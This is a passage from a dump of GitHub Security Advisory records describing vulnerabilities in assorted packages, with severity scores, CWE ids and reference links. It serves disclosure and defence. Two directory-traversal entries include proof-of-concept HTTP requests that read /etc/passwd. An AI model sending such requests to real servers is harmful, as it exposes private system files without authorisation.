{'https://github.com/advisories/GHSA-x3rq-r3cm-5vc4', 'https://huntr.dev/bounties/bfffae58-b3cd-4e0e-b1f2-3db387a22c3d', 'https://github.com/publify/publify/commit/16fceecadbe80ab0ef846b62a12dc7bfff10b8c5', 'https://github.com/publify/publify/releases/tag/v9.2.7', 'https://nvd.nist.gov/vuln/detail/CVE-2022-0524'}
| null |
GHSA
|
GHSA-rvg5-f5fj-mxvg
|
Cross-site Scripting in Jenkins Credentials Plugin
|
Jenkins Credentials Plugin 1111.v35a_307992395 and earlier, except 1087.1089.v2f1b_9a_b_040e4, 1074.1076.v39c30cecb_0e2, and 2.6.1.1, does not escape the name and description of Credentials parameters on views displaying parameters, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.
|
{'CVE-2022-29036'}
|
2022-04-22T21:06:55Z
|
2022-04-13T00:00:18Z
|
MODERATE
| 5.4
|
{'CWE-79'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2022-29036', 'https://github.com/advisories/GHSA-rvg5-f5fj-mxvg', 'https://www.jenkins.io/security/advisory/2022-04-12/#SECURITY-2617'}
| null |
GHSA
|
GHSA-7cv6-gvx3-m54m
|
Cross-Site Scripting in keystone
|
Versions of `keystone` prior to 4.0.0 are vulnerable to Cross-Site Scripting (XSS). The package fails to properly encode rendered HTML on admin-created blog posts. This allows attackers to execute arbitrary JavaScript in the victim's browser. Exploiting this vulnerability requires having access to an admin account.
## Recommendation
Update to version 4.0.0 or later.
|
{'CVE-2017-15881'}
|
2021-06-11T13:54:41Z
|
2017-11-16T01:47:02Z
|
MODERATE
| 4.8
|
{'CWE-79'}
|
{'https://securelayer7.net/download/pdf/KeystoneJS-Pentest-Report-SecureLayer7.pdf', 'https://github.com/advisories/GHSA-7cv6-gvx3-m54m', 'https://github.com/keystonejs/keystone/pull/4478', 'http://blog.securelayer7.net/keystonejs-open-source-penetration-testing-report/', 'https://nvd.nist.gov/vuln/detail/CVE-2017-15881', 'https://github.com/keystonejs/keystone/issues/4437', 'http://www.securityfocus.com/bid/101541', 'https://www.npmjs.com/advisories/981'}
| null |
GHSA
|
GHSA-2m8v-572m-ff2v
|
Command Injection Vulnerability
|
### Impact
command injection vulnerability
### Patches
Problem was fixed with a parameter check. Please upgrade to version >= 5.3.1
### Workarounds
If you cannot upgrade, be sure to check or sanitize service parameters that are passed to si.inetLatency(), si.inetChecksite(), si.services(), si.processLoad() ... do only allow strings, reject any arrays. String sanitation works as expected.
|
{'CVE-2021-21315'}
|
2021-03-19T17:54:20Z
|
2021-02-16T16:51:04Z
|
MODERATE
| 0
|
{'CWE-78'}
|
{'https://lists.apache.org/thread.html/r8afea9a83ed568f2647cccc6d8d06126f9815715ddf9a4d479b26b05@%3Cissues.cordova.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2021-21315', 'https://github.com/sebhildebrandt/systeminformation/commit/07daa05fb06f24f96297abaa30c2ace8bfd8b525', 'https://github.com/advisories/GHSA-2m8v-572m-ff2v', 'https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-2m8v-572m-ff2v', 'https://security.netapp.com/advisory/ntap-20210312-0007/', 'https://www.npmjs.com/package/systeminformation'}
| null |
GHSA
|
GHSA-4wch-fwmx-cf47
|
Directory Traversal in augustine
|
Affected versions of `augustine` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
## Proof of Concept
```
GET //etc/passwd HTTP/1.1
host:foo
```
## Recommendation
No direct patch is available at this time.
Currently, the best mitigation for this flaw is to use a different, functionally equivalent static file server package.
|
{'CVE-2017-0930'}
|
2021-01-08T19:53:19Z
|
2018-09-18T13:50:25Z
|
HIGH
| 0
|
{'CWE-22'}
|
{'https://github.com/advisories/GHSA-4wch-fwmx-cf47', 'https://www.npmjs.com/advisories/559', 'https://nvd.nist.gov/vuln/detail/CVE-2017-0930', 'https://hackerone.com/reports/296282'}
| null |
GHSA
|
GHSA-x446-3xhq-5xfp
|
Exposure of Resource to Wrong Sphere in Simple-Wayland-HotKey-Daemon
|
SWHKD 1.1.5 allows arbitrary file-existence tests via the -c option.
|
{'CVE-2022-27814'}
|
2022-04-26T13:03:53Z
|
2022-04-15T00:00:40Z
|
LOW
| 3.3
|
{'CWE-668'}
|
{'https://github.com/advisories/GHSA-x446-3xhq-5xfp', 'https://github.com/waycrate/swhkd/releases', 'https://nvd.nist.gov/vuln/detail/CVE-2022-27814', 'https://www.openwall.com/lists/oss-security/2022/04/14/1'}
| null |
GHSA
|
GHSA-458v-4hrf-g3m4
|
socket2 invalidly assumes the memory layout of std::net::SocketAddr
|
The socket2 crate has assumed `std::net::SocketAddrV4` and `std::net::SocketAddrV6` have the same memory layout as the system C representation `sockaddr`. It has simply casted the pointers to convert the socket addresses to the system representation. The standard library does not say anything about the memory layout, and this will cause invalid memory access if the standard library changes the implementation. No warnings or errors will be emitted once the change happens.
|
{'CVE-2020-35920'}
|
2021-08-25T20:50:37Z
|
2021-08-25T20:50:37Z
|
MODERATE
| 5.5
|
{'CWE-188'}
|
{'https://github.com/rust-lang/socket2-rs/issues/119', 'https://nvd.nist.gov/vuln/detail/CVE-2020-35920', 'https://github.com/advisories/GHSA-458v-4hrf-g3m4', 'https://rustsec.org/advisories/RUSTSEC-2020-0079.html'}
| null |
GHSA
|
GHSA-w248-xr37-jx8m
|
High severity vulnerability that affects fastreader
|
lib/entry_controller.rb in the fastreader Gem 1.0.8 for Ruby allows remote attackers to execute arbitrary commands via shell metacharacters in a URL.
|
{'CVE-2013-2615'}
|
2021-09-20T22:26:13Z
|
2017-10-24T18:33:37Z
|
HIGH
| 0
|
{'CWE-94'}
|
{'http://www.openwall.com/lists/oss-security/2013/03/19/9', 'https://nvd.nist.gov/vuln/detail/CVE-2013-2615', 'http://packetstormsecurity.com/files/120845/Ruby-Gem-Fastreader-1.0.8-Code-Execution.html', 'https://github.com/advisories/GHSA-w248-xr37-jx8m', 'http://www.osvdb.org/91232', 'http://packetstormsecurity.com/files/120776/Ruby-Gem-Fastreader-1.0.8-Command-Execution.html', 'http://seclists.org/fulldisclosure/2013/Mar/122'}
| null |
GHSA
|
GHSA-h7j7-pw3v-3v3x
|
Moderate severity vulnerability that affects org.keycloak:keycloak-core
|
keycloak before version 4.0.0.final is vulnerable to a infinite loop in session replacement. A Keycloak cluster with multiple nodes could mishandle an expired session replacement and lead to an infinite loop. A malicious authenticated user could use this flaw to achieve Denial of Service on the server.
|
{'CVE-2018-10912'}
|
2021-09-14T15:43:06Z
|
2018-10-18T16:49:54Z
|
MODERATE
| 4.9
|
{'CWE-835'}
|
{'https://github.com/advisories/GHSA-h7j7-pw3v-3v3x', 'https://nvd.nist.gov/vuln/detail/CVE-2018-10912'}
| null |
GHSA
|
GHSA-537h-rv9q-vvph
|
Access Restriction Bypass
|
Python-RSA 4.0 ignores leading '\0' bytes during decryption of ciphertext. This could conceivably have a security-relevant impact, e.g., by helping an attacker to infer that an application uses Python-RSA, or if the length of accepted ciphertext affects application behavior (such as by causing excessive memory allocation).
|
{'CVE-2020-13757'}
|
2021-03-24T18:24:39Z
|
2021-03-24T18:24:39Z
|
HIGH
| 7.5
|
{'CWE-327'}
|
{'https://github.com/sybrenstuvel/python-rsa/issues/146#issuecomment-641845667', 'https://usn.ubuntu.com/4478-1/', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZYB65VNILRBTXL6EITQTH2PZPK7I23MW/', 'https://nvd.nist.gov/vuln/detail/CVE-2020-13757', 'https://github.com/sybrenstuvel/python-rsa/issues/146', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2KILTHBHNSDUCYV22ODLOKTICJJ7JQIQ/', 'https://github.com/advisories/GHSA-537h-rv9q-vvph'}
| null |
GHSA
|
GHSA-mvw8-v767-qhjm
|
Moderate severity vulnerability that affects radiant
|
Radiant CMS 1.1.4 has XSS via crafted Markdown input in the part_body_content parameter to an admin/pages/*/edit resource.
|
{'CVE-2018-5216'}
|
2021-09-15T21:03:11Z
|
2018-01-06T01:11:52Z
|
MODERATE
| 5.4
|
{'CWE-79'}
|
{'https://github.com/advisories/GHSA-mvw8-v767-qhjm', 'https://nvd.nist.gov/vuln/detail/CVE-2018-5216', 'https://github.com/imsebao/404team/blob/master/radiantcms.md'}
| null |
GHSA
|
GHSA-7mg7-m5c3-3hqj
|
Data races in unicycle
|
Affected versions of this crate unconditionally implemented `Send` & `Sync` for types `PinSlab<T>` & `Unordered<T, S>`. This allows sending non-Send types to other threads and concurrently accessing non-Sync types from multiple threads.
This can result in a data race & memory corruption when types that provide internal mutability without synchronization are contained within `PinSlab<T>` or `Unordered<T, S>` and accessed concurrently from multiple threads.
The flaw was corrected in commits 92f40b4 & 6a6c367 by adding trait bound `T: Send` to `Send` impls for `PinSlab<T>` & `Unordered<T, S>` and adding `T: Sync` to `Sync` impls for `PinSlab<T>` & `Unordered<T, S>`.
| null |
2021-08-25T21:00:39Z
|
2021-08-25T21:00:39Z
|
MODERATE
| 0
|
{'CWE-362'}
|
{'https://github.com/udoprog/unicycle/issues/8', 'https://github.com/advisories/GHSA-7mg7-m5c3-3hqj', 'https://github.com/udoprog/unicycle/commit/6a6c367a0c25f86f998fa315ea90c328f685b194', 'https://github.com/udoprog/unicycle/commit/92f40b4a2c671553dfa96feacff0265206c44ce5', 'https://rustsec.org/advisories/RUSTSEC-2020-0116.html'}
| null |
GHSA
|
GHSA-vfrc-ggmc-5jwv
|
Cross-site Scripting in django-helpdesk
|
django-helpdesk is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
|
{'CVE-2021-3950'}
|
2021-11-24T19:43:03Z
|
2021-11-23T17:55:46Z
|
HIGH
| 8.8
|
{'CWE-79'}
|
{'https://github.com/django-helpdesk/django-helpdesk/commit/04483bdac3b5196737516398b5ce0383875a5c60', 'https://github.com/advisories/GHSA-vfrc-ggmc-5jwv', 'https://nvd.nist.gov/vuln/detail/CVE-2021-3950', 'https://huntr.dev/bounties/4d7a5fdd-b2de-467a-ade0-3f2fb386638e', 'https://github.com/django-helpdesk/django-helpdesk/releases/tag/0.3.2'}
| null |
GHSA
|
GHSA-xpqw-fqpw-35fc
|
Directory Traversal in wangguojing123
|
Affected versions of `wangguojing123` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
Example request:
```
GET /../../../../../../../../../../etc/passwd HTTP/1.1
host:foo
```
## Recommendation
No patch is available for this vulnerability.
It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.
|
{'CVE-2017-16150'}
|
2021-01-14T15:53:37Z
|
2020-09-01T16:57:54Z
|
HIGH
| 0
|
{'CWE-22'}
|
{'https://nodesecurity.io/advisories/374', 'https://www.npmjs.com/advisories/374', 'https://github.com/advisories/GHSA-xpqw-fqpw-35fc', 'https://github.com/JacksonGL/NPM-Vuln-PoC/tree/master/directory-traversal/wangguojing123', 'https://nvd.nist.gov/vuln/detail/CVE-2017-16150'}
| null |
GHSA
|
GHSA-jrpg-35hw-m4p9
|
Capture-replay in Gitea
|
Gitea is a project to help users set up a self-hosted Git service. Gitea before 1.11.2 is affected by Trusting HTTP Permission Methods on the Server Side when referencing the vulnerable admin or user API. This could allow a remote malicious user to execute arbitrary code.
|
{'CVE-2021-45327'}
|
2022-02-15T00:17:58Z
|
2022-02-09T00:00:29Z
|
CRITICAL
| 9.8
|
{'CWE-294'}
|
{'https://github.com/go-gitea/gitea/pull/10465', 'https://blog.gitea.io/2020/03/gitea-1.11.2-is-released/', 'https://github.com/go-gitea/gitea/pull/10462', 'https://nvd.nist.gov/vuln/detail/CVE-2021-45327', 'https://github.com/go-gitea/gitea/pull/10582', 'https://github.com/advisories/GHSA-jrpg-35hw-m4p9'}
| null |
GHSA
|
GHSA-xwhf-g6j5-j5gc
|
Float cast overflow undefined behavior
|
### Impact
When the `boxes` argument of `tf.image.crop_and_resize` has a very large value, the CPU kernel implementation receives it as a C++ `nan` floating point value. Attempting to operate on this is undefined behavior which later produces a segmentation fault.
### Patches
We have patched the issue in c0319231333f0f16e1cc75ec83660b01fedd4182 and will release TensorFlow 2.4.0 containing the patch. TensorFlow nightly packages after this commit will also have the issue resolved.
### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
### Attribution
This vulnerability has been reported in #42129
|
{'CVE-2020-15266'}
|
2021-08-26T15:20:48Z
|
2020-11-13T17:18:29Z
|
LOW
| 3.7
|
{'CWE-119'}
|
{'https://github.com/tensorflow/tensorflow/pull/42143/commits/3ade2efec2e90c6237de32a19680caaa3ebc2845', 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-xwhf-g6j5-j5gc', 'https://nvd.nist.gov/vuln/detail/CVE-2020-15266', 'https://github.com/tensorflow/tensorflow/issues/42129', 'https://github.com/advisories/GHSA-xwhf-g6j5-j5gc'}
| null |
GHSA
|
GHSA-cwv3-863g-39vx
|
Stack overflow due to looping TFLite subgraph
|
### Impact
TFlite graphs must not have loops between nodes. However, this condition was not checked and an attacker could craft models that would result in infinite loop during evaluation. In certain cases, the infinite loop would be replaced by stack overflow due to too many recursive calls.
For example, the [`While` implementation](https://github.com/tensorflow/tensorflow/blob/106d8f4fb89335a2c52d7c895b7a7485465ca8d9/tensorflow/lite/kernels/while.cc) could be tricked into a scneario where both the body and the loop subgraphs are the same. Evaluating one of the subgraphs means calling the `Eval` function for the other and this quickly exhaust all stack space.
### Patches
We have patched the issue in GitHub commit [9c1dc920d8ffb4893d6c9d27d1f039607b326743](https://github.com/tensorflow/tensorflow/commit/9c1dc920d8ffb4893d6c9d27d1f039607b326743) (for the `While` operator) and in GitHub commit [c6173f5fe66cdbab74f4f869311fe6aae2ba35f4](https://github.com/tensorflow/tensorflow/commit/c6173f5fe66cdbab74f4f869311fe6aae2ba35f4) (in general).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
### Attribution
This vulnerability has been reported by members of the Aivul Team from Qihoo 360.
|
{'CVE-2021-29591'}
|
2022-04-26T18:09:15Z
|
2021-05-21T14:26:56Z
|
HIGH
| 7.3
|
{'CWE-835', 'CWE-674'}
|
{'https://github.com/advisories/GHSA-cwv3-863g-39vx', 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-cwv3-863g-39vx', 'https://nvd.nist.gov/vuln/detail/CVE-2021-29591', 'https://github.com/tensorflow/tensorflow/commit/c6173f5fe66cdbab74f4f869311fe6aae2ba35f4', 'https://github.com/tensorflow/tensorflow/commit/9c1dc920d8ffb4893d6c9d27d1f039607b326743'}
| null |
GHSA
|
GHSA-8fxc-qm65-vpxg
|
Temporary urls leaked via logging
|
In OpenStack Swift prior to 2.15.2, the proxy-server logs full tempurl paths, potentially leaking reusable tempurl signatures to anyone with read access to these logs. All Swift deployments using the tempurl middleware are affected.
|
{'CVE-2017-8761'}
|
2021-06-14T21:44:11Z
|
2021-06-08T19:23:22Z
|
LOW
| 0
|
{'CWE-200', 'CWE-117'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2017-8761', 'https://bugs.launchpad.net/swift/+bug/1685798/comments/18', 'https://github.com/advisories/GHSA-8fxc-qm65-vpxg', 'https://launchpad.net/bugs/1685798'}
| null |
GHSA
|
GHSA-77q4-m83q-w76v
|
Missing Origin Validation in browserify-hmr
|
Versions of `browserify-hmr` prior to 0.4.0 are missing origin validation on the websocket server.
This vulnerability allows a remote attacker to steal a developer's source code because the origin of requests to the websocket server that is used for Hot Module Replacement (HMR) are not validated.
## Recommendation
Upgrade to version 0.4.0 or later.
|
{'CVE-2018-14730'}
|
2021-09-24T20:59:16Z
|
2020-09-01T21:18:20Z
|
HIGH
| 7.5
|
{'CWE-200'}
|
{'https://github.com/advisories/GHSA-77q4-m83q-w76v', 'https://blog.cal1.cn/post/Sniffing%20Codes%20in%20Hot%20Module%20Reloading%20Messages)', 'https://www.npmjs.com/advisories/726', 'https://github.com/AgentME/browserify-hmr/issues/41', 'https://nvd.nist.gov/vuln/detail/CVE-2018-14730', 'https://blog.cal1.cn/post/Sniffing%20Codes%20in%20Hot%20Module%20Reloading%20Messages'}
| null |
GHSA
|
GHSA-4hvv-7x94-7vq8
|
Null dereference in Grappler's `TrySimplify`
|
### Impact
The implementation of [`TrySimplify`](https://github.com/tensorflow/tensorflow/blob/c22d88d6ff33031aa113e48aa3fc9aa74ed79595/tensorflow/core/grappler/optimizers/arithmetic_optimizer.cc#L390-L401) has undefined behavior due to dereferencing a null pointer in corner cases that
result in optimizing a node with no inputs.
### Patches
We have patched the issue in GitHub commit [e6340f0665d53716ef3197ada88936c2a5f7a2d3](https://github.com/tensorflow/tensorflow/commit/e6340f0665d53716ef3197ada88936c2a5f7a2d3).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
|
{'CVE-2021-29616'}
|
2021-05-21T14:28:47Z
|
2021-05-21T14:28:47Z
|
LOW
| 2.5
|
{'CWE-476'}
|
{'https://github.com/tensorflow/tensorflow/commit/e6340f0665d53716ef3197ada88936c2a5f7a2d3', 'https://github.com/advisories/GHSA-4hvv-7x94-7vq8', 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-4hvv-7x94-7vq8', 'https://nvd.nist.gov/vuln/detail/CVE-2021-29616'}
| null |
GHSA
|
GHSA-vc5p-j8vw-mc6x
|
Permissions bypass in pleaser
|
Failure to normalize the umask in pleaser before 0.4 allows a local attacker to gain full root privileges if they are allowed to execute at least one command.
|
{'CVE-2021-31155'}
|
2021-08-25T21:01:47Z
|
2021-08-25T21:01:47Z
|
HIGH
| 7.8
|
{'CWE-279', 'CWE-269'}
|
{'https://www.openwall.com/lists/oss-security/2021/05/18/1', 'https://github.com/advisories/GHSA-vc5p-j8vw-mc6x', 'https://gitlab.com/edneville/please/-/tree/master/src/bin', 'https://gitlab.com/edneville/please', 'https://crates.io/crates/pleaser', 'https://nvd.nist.gov/vuln/detail/CVE-2021-31155'}
| null |
GHSA
|
GHSA-rpq8-mmwh-q9hm
|
Directory traversal in Eclipse Mojarra
|
Directory traversal in Eclipse Mojarra before 2.3.14 allows attackers to read arbitrary files via the loc parameter or con parameter.
|
{'CVE-2020-6950'}
|
2022-04-22T15:47:12Z
|
2021-09-01T18:23:58Z
|
HIGH
| 7.5
|
{'CWE-22'}
|
{'https://www.oracle.com/security-alerts/cpuapr2022.html', 'https://bugs.eclipse.org/bugs/show_bug.cgi?id=550943', 'https://github.com/eclipse-ee4j/mojarra/commit/cefbb9447e7be560e59da2da6bd7cb93776f7741', 'https://github.com/eclipse-ee4j/mojarra/issues/4571', 'https://www.oracle.com/security-alerts/cpuoct2021.html', 'https://nvd.nist.gov/vuln/detail/CVE-2020-6950', 'https://github.com/advisories/GHSA-rpq8-mmwh-q9hm', 'https://www.oracle.com/security-alerts/cpujan2022.html'}
| null |
GHSA
|
GHSA-97x5-cc53-cv4v
|
Cross site scripting in froala-editor
|
A cross site scripting (XSS) vulnerability in the Insert Video function of Froala WYSIWYG Editor allows attackers to execute arbitrary web scripts or HTML.
|
{'CVE-2020-22864'}
|
2021-10-29T13:50:49Z
|
2021-10-28T23:14:06Z
|
MODERATE
| 6.1
|
{'CWE-79'}
|
{'https://github.com/418sec/wysiwyg-editor/pull/1', 'https://www.youtube.com/watch?v=WE3b1iSnWJY', 'https://github.com/froala/wysiwyg-editor/issues/3880', 'https://github.com/advisories/GHSA-97x5-cc53-cv4v', 'https://nvd.nist.gov/vuln/detail/CVE-2020-22864', 'https://github.com/froala/wysiwyg-editor/pull/3911'}
| null |
GHSA
|
GHSA-4859-gpc7-4j66
|
Command Injection in dot
|
All versions of dot are vulnerable to Command Injection. The template compilation may execute arbitrary commands if an attacker can inject code in the template or if a Prototype Pollution-like vulnerability can be exploited to alter an Object's prototype.
| null |
2021-08-04T20:55:57Z
|
2019-06-05T21:24:29Z
|
MODERATE
| 0
|
{'CWE-77'}
|
{'https://github.com/advisories/GHSA-4859-gpc7-4j66', 'https://hackerone.com/reports/390929', 'https://www.npmjs.com/advisories/798'}
| null |
GHSA
|
GHSA-x79j-wgqv-g8h2
|
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in typo3/cms-form
|
### Problem
It has been discovered that the Form Designer backend module of the Form Framework is vulnerable to cross-site scripting. A valid backend user account with access to the form module is needed to exploit this vulnerability.
### Solution
Update to TYPO3 versions 10.4.14 or 11.1.1 that fix the problem described.
### Credits
Thanks to Richie Lee who reported this issue and to TYPO3 framework merger Andreas Fernandez who fixed the issue.
### References
* [TYPO3-CORE-SA-2021-004](https://typo3.org/security/advisory/typo3-core-sa-2021-004)
|
{'CVE-2021-21358'}
|
2022-04-19T19:02:50Z
|
2021-03-23T01:54:06Z
|
MODERATE
| 5
|
{'CWE-79'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2021-21358', 'https://typo3.org/security/advisory/typo3-core-sa-2021-004', 'https://github.com/TYPO3/TYPO3.CMS/security/advisories/GHSA-x79j-wgqv-g8h2', 'https://github.com/advisories/GHSA-x79j-wgqv-g8h2', 'https://packagist.org/packages/typo3/cms-form'}
| null |
GHSA
|
GHSA-876r-hj45-fw7g
|
Sandbox Breakout / Arbitrary Code Execution in safer-eval
|
All versions of `safer-eval` are vulnerable to Sandbox Escape leading to Remote Code Execution. It is possible to escape the sandbox by forcing exceptions recursively in the evaluated code. This may allow attacker to execute arbitrary code in the system.
## Recommendation
The package is not suited to receive arbitrary user input. Consider using an alternative package.
| null |
2020-09-03T21:18:41Z
|
2020-09-03T21:18:41Z
|
CRITICAL
| 0
| null |
{'https://www.npmjs.com/advisories/1221', 'https://github.com/advisories/GHSA-876r-hj45-fw7g', 'https://gist.github.com/JLLeitschuh/609bb2efaff22ed84fe182cf574c023a'}
| null |
GHSA
|
GHSA-2f2w-349x-vrqm
|
Cross-site scripting (XSS) from field and configuration text displayed in the Panel
|
On Saturday, @hdodov reported that the Panel's `ListItem` component (used in the pages and files section for example) displayed HTML in page titles as it is. This could be used for cross-site scripting (XSS) attacks.
We used his report as an opportunity to find and fix XSS issues related to dynamic site content throughout the Panel codebase.
### Impact
Cross-site scripting (XSS) is a type of vulnerability that allows to execute any kind of JavaScript code inside the Panel session of other users. In the Panel, a harmful script can for example trigger requests to Kirby's API with the permissions of the victim.
Such vulnerabilities are critical if you might have potential attackers in your group of authenticated Panel users. They can escalate their privileges if they get access to the Panel session of an admin user. Depending on your site, other JavaScript-powered attacks are possible.
Visitors without Panel access can only use this attack vector if your site allows changing site data from a frontend form (for example user self-registration or the creation of pages from a contact or other frontend form). If you validate or sanitize the provided form data, you are already protected against such attacks by external visitors.
### Patches
[Kirby 3.5.7](https://github.com/getkirby/kirby/releases/tag/3.5.7) contains patches for the following issues we found during our investigation:
- Some translated error and info messages contain placeholders to dynamically insert information like page titles or filenames. While the translation strings are allowed to contain HTML formatting, the dynamic data needs to be protected against XSS attacks. Kirby 3.5.7 now escapes the dynamic data.
- Our `Box` component used to display information for the user supports HTML output for specific use-cases. We found out that the dialogs used in the `files`, `pages` and `users` fields as well as the `fields` section used it to display raw exception or error messages. These messages are now escaped.
- The users and settings views display user and language data using the `ListItem` component that supports HTML. We now escape the dynamic data before it is passed to the `ListItem` component.
- Some of our sections and fields support HTML for their `text`, `help` and/or `info` properties. This allows custom formatting from the blueprint, but also caused the original issue reported to us that allowed to inject HTML code from the content itself. Kirby 3.5.7 now escapes the default `text` displayed by the `files` and `pages` sections (filename/page title), the `files`, `pages` and `users` fields (filename/page title/username) and by query-based `checkboxes`, `radio`, `tags` and `multiselect` fields (default text depending on the used query).
**Note:** Custom `text`, `help` and `info` queries in blueprints are *not* escaped in 3.5.7. We support HTML in these properties because there are valid use-cases for custom formatting. However there can still be XSS vulnerabilities depending on your use of these properties. In Kirby 3.6 we will provide a new feature that will make it much easier to control whether you want to allow HTML from query placeholders.
|
{'CVE-2021-32735'}
|
2022-04-19T19:03:01Z
|
2021-07-02T19:18:43Z
|
HIGH
| 7.1
|
{'CWE-80'}
|
{'https://github.com/advisories/GHSA-2f2w-349x-vrqm', 'https://github.com/getkirby/kirby/releases/tag/3.5.7', 'https://github.com/getkirby/kirby/security/advisories/GHSA-2f2w-349x-vrqm', 'https://nvd.nist.gov/vuln/detail/CVE-2021-32735'}
| null |
GHSA
|
GHSA-6phf-73q6-gh87
|
Insecure Deserialization in Apache Commons Beanutils
|
In Apache Commons Beanutils 1.9.2, a special BeanIntrospector class was added which allows suppressing the ability for an attacker to access the classloader via the class property available on all Java objects. We, however were not using this by default characteristic of the PropertyUtilsBean.
|
{'CVE-2019-10086'}
|
2022-04-21T17:53:38Z
|
2020-06-15T20:36:17Z
|
HIGH
| 7.3
|
{'CWE-502'}
|
{'https://lists.apache.org/thread.html/02094ad226dbc17a2368beaf27e61d8b1432f5baf77d0ca995bb78bc@%3Cissues.commons.apache.org%3E', 'https://lists.debian.org/debian-lts-announce/2019/08/msg00030.html', 'https://www.oracle.com/security-alerts/cpujan2021.html', 'https://www.oracle.com/security-alerts/cpuapr2022.html', 'https://lists.apache.org/thread.html/956995acee0d8bc046f1df0a55b7fbeb65dd2f82864e5de1078bacb0@%3Cissues.commons.apache.org%3E', 'https://lists.apache.org/thread.html/1f78f1e32cc5614ec0c5b822ba4bd7fc8e8b5c46c8e038b6bd609cb5@%3Cissues.commons.apache.org%3E', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4APPGLBWMFAS4WHNLR4LIJ65DJGPV7TF/', 'https://lists.apache.org/thread.html/c94bc9649d5109a663b2129371dc45753fbdeacd340105548bbe93c3@%3Cdev.shiro.apache.org%3E', 'https://lists.apache.org/thread.html/r46e536fc98942dce99fadd2e313aeefe90c1a769c5cd85d98df9d098@%3Cissues.nifi.apache.org%3E', 'https://lists.apache.org/thread.html/r6194ced4828deb32023cd314e31f41c61d388b58935d102c7de91f58@%3Cdev.atlas.apache.org%3E', 'https://www.oracle.com/security-alerts/cpujan2020.html', 'https://lists.apache.org/thread.html/a684107d3a78e431cf0fbb90629e8559a36ff8fe94c3a76e620b39fa@%3Cdev.shiro.apache.org%3E', 'https://access.redhat.com/errata/RHSA-2020:0804', 'https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E', 'https://www.oracle.com/security-alerts/cpuApr2021.html', 'https://lists.apache.org/thread.html/re2028d4d76ba1db3e3c3a722d6c6034e801cc3b309f69cc166eaa32b@%3Ccommits.nifi.apache.org%3E', 'https://access.redhat.com/errata/RHSA-2020:0811', 'https://www.oracle.com/security-alerts/cpujul2020.html', 'https://nvd.nist.gov/vuln/detail/CVE-2019-10086', 'https://lists.apache.org/thread.html/5261066cd7adee081ee05c8bf0e96cf0b2eeaced391e19117ae4daa6@%3Cdev.shiro.apache.org%3E', 'https://www.oracle.com/security-alerts/cpuoct2021.html', 'https://lists.apache.org/thread.html/rd2d2493f4f1af6980d265b8d84c857e2b7ab80a46e1423710c448957@%3Cissues.nifi.apache.org%3E', 'https://lists.apache.org/thread.html/ra87ac17410a62e813cba901fdd4e9a674dd53daaf714870f28e905f1@%3Cdev.atlas.apache.org%3E', 'https://lists.apache.org/thread.html/r513a7a21c422170318115463b399dd58ab447fe0990b13e5884f0825@%3Ccommits.dolphinscheduler.apache.org%3E', 'https://access.redhat.com/errata/RHSA-2020:0194', 'https://lists.apache.org/thread.html/r967953a14e05016bc4bcae9ef3dd92e770181158b4246976ed8295c9@%3Cdev.brooklyn.apache.org%3E', 'https://lists.apache.org/thread.html/ra9a139fdc0999750dcd519e81384bc1fe3946f311b1796221205f51c@%3Ccommits.dolphinscheduler.apache.org%3E', 'https://lists.apache.org/thread.html/racd3e7b2149fa2f255f016bd6bffab0fea77b6fb81c50db9a17f78e6@%3Cdev.atlas.apache.org%3E', 'https://www.oracle.com/security-alerts/cpujan2022.html', 'https://lists.apache.org/thread.html/d6ca9439c53374b597f33b7ec180001625597db48ea30356af01145f@%3Cdev.shiro.apache.org%3E', 'https://lists.apache.org/thread.html/3d1ed1a1596c08c4d5fea97b36c651ce167b773f1afc75251ce7a125@%3Ccommits.tinkerpop.apache.org%3E', 'https://lists.apache.org/thread.html/reee57101464cf7622d640ae013b2162eb864f603ec4093de8240bb8f@%3Cdev.atlas.apache.org%3E', 'https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E', 'https://lists.apache.org/thread.html/ra41fd0ad4b7e1d675c03a5081a16a6603085a4e37d30b866067566fe@%3Cissues.nifi.apache.org%3E', 'https://lists.apache.org/thread.html/2fd61dc89df9aeab738d2b49f48d42c76f7d53b980ba04e1d48bce48@%3Cdev.shiro.apache.org%3E', 'https://access.redhat.com/errata/RHSA-2019:4317', 'https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E', 